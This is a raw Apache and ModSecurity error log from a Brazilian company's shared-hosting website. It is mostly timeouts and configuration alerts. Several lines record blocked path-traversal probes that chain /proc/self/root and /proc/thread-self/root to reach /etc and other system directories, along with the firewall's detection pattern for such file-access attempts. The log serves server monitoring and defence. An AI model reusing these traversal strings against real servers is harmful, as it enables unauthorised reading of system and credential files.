[Thu Mar 19 12:41:09.129778 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36852] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:41:33.029833 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37474] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:41:58.121792 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38110] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:42:07.283924 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.244.43:47482] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwZT_-YZRR_7pZ7nDKZXwAAA8g"]
[Thu Mar 19 12:42:15.898200 2026] [core:alert] [pid 26799:tid 140411557287680] [client 57.141.18.53:41710] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:42:26.751457 2026] [mime_magic:error] [pid 17653:tid 140411708356352] (70014)End of file found: [client 74.7.241.31:34608] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/firmware
[Thu Mar 19 12:42:26.751612 2026] [access_compat:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:34608] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/firmware
[Thu Mar 19 12:42:28.129817 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38986] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:42:52.106618 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39610] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:42:58.973806 2026] [core:alert] [pid 17653:tid 140411632822016] [client 57.141.18.66:42880] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:43:11.954120 2026] [core:alert] [pid 31803:tid 140411691570944] [client 57.141.18.12:43246] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:43:12.868498 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] [client 198.57.247.228:17304] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Thu Mar 19 12:43:18.122049 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40298] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:43:32.577206 2026] [mime_magic:error] [pid 14269:tid 140411708356352] (70014)End of file found: [client 57.141.18.35:43422] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:43:50.977794 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41010] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:43:52.929058 2026] [core:alert] [pid 30077:tid 140411607643904] [client 57.141.18.109:44248] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:44:16.237791 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41826] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:44:38.113828 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42328] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:45:03.273801 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42962] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:45:30.137814 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43680] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:45:52.165583 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.228.61:56850] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwaMAbLMZ6AikZjR9Vr7AAAAAg"]
[Thu Mar 19 12:45:55.127633 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44406] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:46:10.510369 2026] [core:alert] [pid 14269:tid 140411649607424] [client 74.7.243.128:52606] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet/face
[Thu Mar 19 12:46:17.133805 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45084] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:46:41.121923 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45648] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:47:04.142053 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46222] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:47:09.639297 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.244.43:44258] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwaffu8EFLIOrSqIpu2sQAAAkQ"]
[Thu Mar 19 12:47:26.139245 2026] [core:alert] [pid 27293:tid 140411540502272] [client 57.141.18.124:50140] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:47:28.033826 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46924] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:47:50.137839 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47506] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:48:16.122965 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48264] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:48:44.133779 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48920] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:49:11.123901 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49534] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:49:36.130616 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50222] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:50:05.151709 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50948] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:50:36.121804 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51842] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:50:59.310363 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 57.141.18.40:55862] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:51:01.555710 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.228.61:59766] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwbZeoXxyEfFpUF8f8cRgAAAU4"]
[Thu Mar 19 12:51:02.145794 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52680] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:51:25.261807 2026] [proxy_fcgi:error] [pid 14269:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53246] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:51:45.556218 2026] [core:alert] [pid 27293:tid 140411641214720] [client 57.141.18.77:56642] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:51:48.129779 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53906] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:52:11.100385 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54616] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:52:12.780908 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.244.43:51056] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwbrOyqAr6etmhZHNpvGQAAAE8"]
[Thu Mar 19 12:52:22.192805 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:40456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwbtsdf6f5d65gmYZSHOAAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:52:28.763834 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:33130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwbvAkwaGbbGflqUZDV2wAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:52:34.065902 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55210] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:52:43.096378 2026] [mime_magic:error] [pid 17887:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:46666] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/lib
[Thu Mar 19 12:52:43.096659 2026] [access_compat:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:46666] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/lib
[Thu Mar 19 12:52:54.359818 2026] [mime_magic:error] [pid 31803:tid 140411716749056] (70014)End of file found: [client 57.141.18.51:59012] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:52:57.137831 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:53:05.091688 2026] [core:alert] [pid 26799:tid 140411582465792] [client 57.141.18.30:59310] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:53:21.134100 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56476] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:53:29.587030 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:56748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwb-eyqAr6etmhZHNpvWAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:53:50.126856 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57224] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:53:50.426270 2026] [core:alert] [pid 30077:tid 140411741927168] [client 57.141.18.109:60500] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:54:12.772913 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:10744] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:54:12.773033 2026] [access_compat:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:10744] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Thu Mar 19 12:54:16.869812 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57966] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:54:34.443987 2026] [core:alert] [pid 27403:tid 140411632822016] [client 57.141.18.47:33308] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:54:40.133823 2026] [proxy_fcgi:error] [pid 14269:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58680] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:54:44.549457 2026] [core:alert] [pid 19093:tid 140411683178240] [client 74.7.243.128:39802] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:54:57.817418 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:32994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwcUda6ubjKNq_cu4Zl0AAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 12:55:05.485791 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59252] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:55:32.033855 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:56:01.127197 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60756] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:56:05.822675 2026] [mime_magic:error] [pid 27403:tid 140411699963648] (70014)End of file found: [client 57.141.18.98:35700] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:56:12.408101 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.228.61:56454] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwcmhkFeYa1D6dYQnAA6AAAAcs"]
[Thu Mar 19 12:56:23.179037 2026] [mime_magic:error] [pid 30077:tid 140411565680384] (70014)End of file found: [client 57.141.18.61:36188] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:56:31.229803 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33220] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:56:57.821167 2026] [mime_magic:error] [pid 27293:tid 140411557287680] (70014)End of file found: [client 57.141.18.19:37104] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:57:04.145836 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34086] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:57:23.626045 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.244.43:34064] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwc4hkFeYa1D6dYQnABAwAAAcc"]
[Thu Mar 19 12:57:35.125827 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35078] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:57:56.129834 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:35690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:57:56.641803 2026] [mime_magic:error] [pid 27403:tid 140411574073088] (70014)End of file found: [client 57.141.18.28:38802] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:58:18.133822 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36292] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:58:40.133871 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36924] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:59:02.145817 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37424] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:59:24.121789 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38030] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:59:46.085053 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38636] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:59:46.362781 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.243.128:55112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwdcl_V7PWP6ixUYl7M2gAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Thu Mar 19 13:00:09.128579 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39118] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:00:34.125806 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39720] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:01:00.132048 2026] [proxy_fcgi:error] [pid 27403:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40398] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:01:14.390896 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.228.61:52474] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwdyv-YZRR_7pZ7nDKbnwAAA9I"]
[Thu Mar 19 13:01:22.845543 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:37458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwd0sdf6f5d65gmYZSIegAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 13:01:30.130696 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41214] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:01:41.095705 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.243.128:59096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwd5V_V7PWP6ixUYl7NNQAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:02:02.129787 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42062] AH01075: Error dispatching request to : (polling)
